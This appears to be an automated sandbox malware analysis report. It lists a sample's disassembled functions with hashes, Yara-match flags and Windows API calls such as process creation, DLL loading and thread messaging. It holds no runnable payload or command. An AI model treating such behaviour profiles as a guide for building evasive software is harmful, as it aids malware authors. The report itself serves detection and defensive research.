                                                                                                                                        • Opcode ID: b22fb1f1714e81b10607093c8e660234c706c8843472a02ba7f9eb9442545006
                                                                                                                                        • Instruction ID: 6ea33b564c8904ddd8dbb83baee9985fb79cdedc85f4a9a2809139f20befed78
                                                                                                                                        • Opcode Fuzzy Hash: b22fb1f1714e81b10607093c8e660234c706c8843472a02ba7f9eb9442545006
                                                                                                                                        • Instruction Fuzzy Hash: 1D90022131144403D150B59954186164005D7E1301F55D015E0414654DDA5689565222
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 036B2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 84013abf9eeb12abd2c800cb059ce1eb3e522b798fe5596961ac929651cb6f6e
                                                                                                                                        • Instruction ID: b4de437b0b3605abbe1409ef028ce618397d47850f4e05fdcc39d9c6a9ff35f2
                                                                                                                                        • Opcode Fuzzy Hash: 84013abf9eeb12abd2c800cb059ce1eb3e522b798fe5596961ac929651cb6f6e
                                                                                                                                        • Instruction Fuzzy Hash: ED90022922344402D190B599540861A0005C7D1202F95D419A0015658DCA5689695321
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 036B2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: d68c0d771d25b694d3c058ada4d9a96e982ec1fa25708ac27bb961aa95bd50c0
                                                                                                                                        • Instruction ID: f461309a3b35aae2e51eb906a5431bb2ee4a13cc3cb820f4e8b8f29a061046eb
                                                                                                                                        • Opcode Fuzzy Hash: d68c0d771d25b694d3c058ada4d9a96e982ec1fa25708ac27bb961aa95bd50c0
                                                                                                                                        • Instruction Fuzzy Hash: 2F90023121144813D121B59945047170009C7D0241F95C416A0424658E97978A52A121
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 036B2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 4c9680836b72aac95b0f6893826e360d8c4f313b0db44ed7d861032e5e1fbd43
                                                                                                                                        • Instruction ID: 1d7d119d8c55b1078065678c53b4297275e02c4f3eb53e9ab9a07d493fc1b76d
                                                                                                                                        • Opcode Fuzzy Hash: 4c9680836b72aac95b0f6893826e360d8c4f313b0db44ed7d861032e5e1fbd43
                                                                                                                                        • Instruction Fuzzy Hash: D3900221252485525555F59944045174006D7E0241795C016A1414A50D86679956D621
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 036B2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: c2084f4ef9bbfaadafb4bd689610a661a05a56a7cc25befd1a0bd8fe8d9a6f42
                                                                                                                                        • Instruction ID: 446499086a55518b370a92765c6a3b9f4d4f661fa3aa5e5c71efeecc4e94d700
                                                                                                                                        • Opcode Fuzzy Hash: c2084f4ef9bbfaadafb4bd689610a661a05a56a7cc25befd1a0bd8fe8d9a6f42
                                                                                                                                        • Instruction Fuzzy Hash: E690023121144C42D110B5994404B560005C7E0301F55C01AA0124754E8756C9517521
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 036B2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 64a8b32ba19e7905618d8772b64853c28fa56d2967ef61233365b3ca681dea20
                                                                                                                                        • Instruction ID: f003cb6829bdd4ec78e490a6d846139ffd3521eb188eb645d112d33bff4cd9de
                                                                                                                                        • Opcode Fuzzy Hash: 64a8b32ba19e7905618d8772b64853c28fa56d2967ef61233365b3ca681dea20
                                                                                                                                        • Instruction Fuzzy Hash: 6A9002312114CC02D120B599840475A0005C7D0301F59C415A4424758E87D689917121
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 036B2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 4041a4c0828627ba121e64e381818bd3d1f3c2651890f4d4aa9ddcb3fc568f13
                                                                                                                                        • Instruction ID: bb485297ba0bec93b1ba3b31167430be06ada38c632fda2bd1f0407b9818b96a
                                                                                                                                        • Opcode Fuzzy Hash: 4041a4c0828627ba121e64e381818bd3d1f3c2651890f4d4aa9ddcb3fc568f13
                                                                                                                                        • Instruction Fuzzy Hash: 1C90023121144802D110B9D954086560005C7E0301F55D015A5024655FC7A689916131
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00E107D9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64threadwindowCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 498 e107d9-e1084a call e29d20 call e2a730 call e141e0 call e01410 call e21050 510 e1086a-e10870 498->510 511 e1084c-e1085b PostThreadMessageW 498->511 511->510 512 e1085d-e10867 511->512 512->510
                                                                                                                                        APIs
                                                                                                                                        • PostThreadMessageW.USER32(C3vB7APK,00000111,00000000,00000000), ref: 00E10857
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_e00000_replace.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                        • String ID: C3vB7APK$C3vB7APK
                                                                                                                                        • API String ID: 1836367815-224894077
                                                                                                                                        • Opcode ID: 593df905b1c757dd64ac2f9291ac97c20b7ce8777e7959efd72ea3ba965eb9a5
                                                                                                                                        • Instruction ID: 3dd5180407fff0c25817551d7785088ae40fd9eec5c18e2558f66d4b4a19785e
                                                                                                                                        • Opcode Fuzzy Hash: 593df905b1c757dd64ac2f9291ac97c20b7ce8777e7959efd72ea3ba965eb9a5
                                                                                                                                        • Instruction Fuzzy Hash: 7F1108B2D0411C7ADB10A6E59C82DEFBBBCDF417A4F058064FA1477142D5245E468BE1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00E107E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 513 e107e0-e1084a call e29d20 call e2a730 call e141e0 call e01410 call e21050 524 e1086a-e10870 513->524 525 e1084c-e1085b PostThreadMessageW 513->525 525->524 526 e1085d-e10867 525->526 526->524
                                                                                                                                        APIs
                                                                                                                                        • PostThreadMessageW.USER32(C3vB7APK,00000111,00000000,00000000), ref: 00E10857
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_e00000_replace.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                        • String ID: C3vB7APK$C3vB7APK
                                                                                                                                        • API String ID: 1836367815-224894077
                                                                                                                                        • Opcode ID: a40b98627cc5d50ece7de107a187b26deb4a606919741b6c6815a407136a656e
                                                                                                                                        • Instruction ID: 1534d65950ec98d8b541999f8d8b0ed390f539576611ca257fd7efd242012df7
                                                                                                                                        • Opcode Fuzzy Hash: a40b98627cc5d50ece7de107a187b26deb4a606919741b6c6815a407136a656e
                                                                                                                                        • Instruction Fuzzy Hash: A30192B2D0121C7AEB11AAE59C82EEFBBBCDF40794F058064FA14B7142D5685E468BF1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00E22930 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 104sleepCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNELBASE(000007D0), ref: 00E229FB
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_e00000_replace.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Sleep
                                                                                                                                        • String ID: net.dll$wininet.dll
                                                                                                                                        • API String ID: 3472027048-1269752229
                                                                                                                                        • Opcode ID: 1360570367d0fb7b8bef5d449e7c85faee9084af8dc4cac859314d46852b89ac
                                                                                                                                        • Instruction ID: 92c4fc68c4af2ee2aa2807946e344e5b0052a58b0f50fd3f6e4e98013a35f13b
                                                                                                                                        • Opcode Fuzzy Hash: 1360570367d0fb7b8bef5d449e7c85faee9084af8dc4cac859314d46852b89ac
                                                                                                                                        • Instruction Fuzzy Hash: 3031ADB1601704BBC724DF64D885FE7BBA8EB88704F00951CFA1D6B281D774BA44CBA4
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00E1E9A5 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 105COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00E1E9C7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_e00000_replace.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Initialize
                                                                                                                                        • String ID: @J7<
                                                                                                                                        • API String ID: 2538663250-2016760708
                                                                                                                                        • Opcode ID: 5886bda2ea2a909f0e33f50c299a636c25a0c79ad67532fc40765d33b76a55d5
                                                                                                                                        • Instruction ID: 2b3599769d1e16d8cc4f25445388cbf910b03571213d4f28f762dd49c0a4fd7b
                                                                                                                                        • Opcode Fuzzy Hash: 5886bda2ea2a909f0e33f50c299a636c25a0c79ad67532fc40765d33b76a55d5
                                                                                                                                        • Instruction Fuzzy Hash: 48313076A0020A9FDB00DFD8D8809EEB7B9BF88304F148559E916AB315D775AE45CBA0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00E1E9B0 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00E1E9C7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_e00000_replace.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Initialize
                                                                                                                                        • String ID: @J7<
                                                                                                                                        • API String ID: 2538663250-2016760708
                                                                                                                                        • Opcode ID: 7c9df6cb28961e964fc0c93e41cf5082c95b158057a8b503456816a7470198de
                                                                                                                                        • Instruction ID: af8260e2c31d4dff3c5135fbe1b6f3f63ae16aa6ad5d553826ff2fe53b4d2548
                                                                                                                                        • Opcode Fuzzy Hash: 7c9df6cb28961e964fc0c93e41cf5082c95b158057a8b503456816a7470198de
                                                                                                                                        • Instruction Fuzzy Hash: 02310FB5A0060A9FDB00DFD8D8809EEB7B9BF88304B108559E915AB314D775EE45CBA0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00E141E0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00E14252
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_e00000_replace.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Load
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2234796835-0
                                                                                                                                        • Opcode ID: 4942236bfcc2cdc72c15d00e4ef94c83d2c3bb9375bfc3a910db54f145811991
                                                                                                                                        • Instruction ID: 555dd322b0d5f3a2ae6d124dd6f78ad721654695aedd2d087de385718ea1e33d
                                                                                                                                        • Opcode Fuzzy Hash: 4942236bfcc2cdc72c15d00e4ef94c83d2c3bb9375bfc3a910db54f145811991
                                                                                                                                        • Instruction Fuzzy Hash: 1F011EB5D4020DABDB10EBE4EC42FDDB3B89B54308F0451A5F918AB281F671EB94CB91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00E281A0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CreateProcessInternalW.KERNELBASE(?,?,?,?,00E17AD3,00000010,?,?,?,00000044,?,00000010,00E17AD3,?,?,?), ref: 00E28203
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_e00000_replace.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateInternalProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2186235152-0
                                                                                                                                        • Opcode ID: b6abc40920fd18004f57404b2121e80bf88f2d8e1aaa096e59434a1a51c70b46
                                                                                                                                        • Instruction ID: affa568f60dfbf77791993b76c0d609702522c43c0fbdf2dc5e5c85bb383b930
                                                                                                                                        • Opcode Fuzzy Hash: b6abc40920fd18004f57404b2121e80bf88f2d8e1aaa096e59434a1a51c70b46
                                                                                                                                        • Instruction Fuzzy Hash: 7201C0B2201118BFCB44DE89DC81EEB77EDEF8C754F418208BA09E7241D630F8518BA4
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00E178BD Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,00E116F0,gk,GD,?), ref: 00E17953
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_e00000_replace.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorMode
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2340568224-0
                                                                                                                                        • Opcode ID: 3efa460b69caa97a9ae5123914c5a9449afb5e3ce6b9a6294e9f1d36124eb74a
                                                                                                                                        • Instruction ID: 397ea7972d50d4e52c68a36890fe5954457c6e897ed102cc9c45b087d20b265e
                                                                                                                                        • Opcode Fuzzy Hash: 3efa460b69caa97a9ae5123914c5a9449afb5e3ce6b9a6294e9f1d36124eb74a
                                                                                                                                        • Instruction Fuzzy Hash: 08F0F67191820877EB04DBB4EC42FDE73A8DB00710F104369FC08E72C0E539D6808691
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00E09400 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00E09445
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_e00000_replace.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateThread
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2422867632-0
                                                                                                                                        • Opcode ID: 7f12d6052917dccba4093190ea7765fcfc7183e6a79559a72e25c45ff0a3fb46
                                                                                                                                        • Instruction ID: dcc3579e211016ce4681523abbf837ef703bd1ff9138a9a8e52e986a85fcd912
                                                                                                                                        • Opcode Fuzzy Hash: 7f12d6052917dccba4093190ea7765fcfc7183e6a79559a72e25c45ff0a3fb46
                                                                                                                                        • Instruction Fuzzy Hash: 8FF06D7338461476E22065A9AC02FDBB38CDB81B61F140069F71DFB1C1D996B88186E9
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00E093FD Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00E09445
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_e00000_replace.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateThread
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2422867632-0
                                                                                                                                        • Opcode ID: 291186dbf43c1889cbb39f886cc81fe7bbe88c09fe59ae057517738384ec3b9a
                                                                                                                                        • Instruction ID: 4b9462e3ff4fafef2ff6b13c36e82a94b9746126ca67da2c45fddee533cd7166
                                                                                                                                        • Opcode Fuzzy Hash: 291186dbf43c1889cbb39f886cc81fe7bbe88c09fe59ae057517738384ec3b9a
                                                                                                                                        • Instruction Fuzzy Hash: C0F06D7268071076E23066A89C03FEB639C9B81760F140029F71DBB1D1C996788186A8
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00E280C0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlAllocateHeap.NTDLL(00E113F9,?,?,00E113F9,GD,?,?,00E113F9,GD,00001000,?,?,00E2997D), ref: 00E280FF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_e00000_replace.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                        • Opcode ID: c15f31648256afec11c07387016be4a71b7fec114b3f184dd39e37366af0fbf5
                                                                                                                                        • Instruction ID: f925f710512c5a8c88325be76b2cfa59511f9bb27af77f9b6efbc0e3b84cc4a7
                                                                                                                                        • Opcode Fuzzy Hash: c15f31648256afec11c07387016be4a71b7fec114b3f184dd39e37366af0fbf5
                                                                                                                                        • Instruction Fuzzy Hash: 90E06572600228BFD614EE98DC41EAB37ACEF89720F004018F908A7242CA70B8108BB9
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00E28110 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,CA62C1D6,00000007,00000000,00000004,00000000,00E13ABA,000000F4,?,?,?,?,?), ref: 00E2814C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_e00000_replace.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeHeap
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3298025750-0
                                                                                                                                        • Opcode ID: 2b7317538ed2ab562b82a06e89bfc92f051dd752748b3b0b0d86a77d6e43a305
                                                                                                                                        • Instruction ID: 4c264e31597c69e15d17644c35bbbde873544d9d812366b37e9166f39493ceb7
                                                                                                                                        • Opcode Fuzzy Hash: 2b7317538ed2ab562b82a06e89bfc92f051dd752748b3b0b0d86a77d6e43a305
                                                                                                                                        • Instruction Fuzzy Hash: C7E06572600228BFD610EE98DC41EAB33ACEF89750F404018F909A7242C670B8108BB9
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00E17B10 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetFileAttributesW.KERNELBASE(?), ref: 00E17B3C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_e00000_replace.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AttributesFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                        • Opcode ID: 17b7fe2669b1969da13cdbc655328eb03617f76aa479ff3bdd72938b73c92513
                                                                                                                                        • Instruction ID: f6e5703937d59ceb4e678be52f1630f5d58361b82b64cf0379ecf6461e8e45d1
                                                                                                                                        • Opcode Fuzzy Hash: 17b7fe2669b1969da13cdbc655328eb03617f76aa479ff3bdd72938b73c92513
                                                                                                                                        • Instruction Fuzzy Hash: B0E0207124C20427F7206978DC45FA6335CC74CB24F141550B95EEB1C1D639F9C14150
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00E17920 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,00E116F0,gk,GD,?), ref: 00E17953
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_e00000_replace.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorMode
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2340568224-0
                                                                                                                                        • Opcode ID: 5f2835592c33483a3209c854186819b959893caa7e4f4cae01b3d752b9690ab4
                                                                                                                                        • Instruction ID: f54e1d94b571f63f866b67e95419a38c46c39fd1a06958d9fd832b13e087637f
                                                                                                                                        • Opcode Fuzzy Hash: 5f2835592c33483a3209c854186819b959893caa7e4f4cae01b3d752b9690ab4
                                                                                                                                        • Instruction Fuzzy Hash: 6CD05EB17883043BF600A6F49C07F5632CC5B40B54F0640A4BA9CFB2C2E966F58085B9
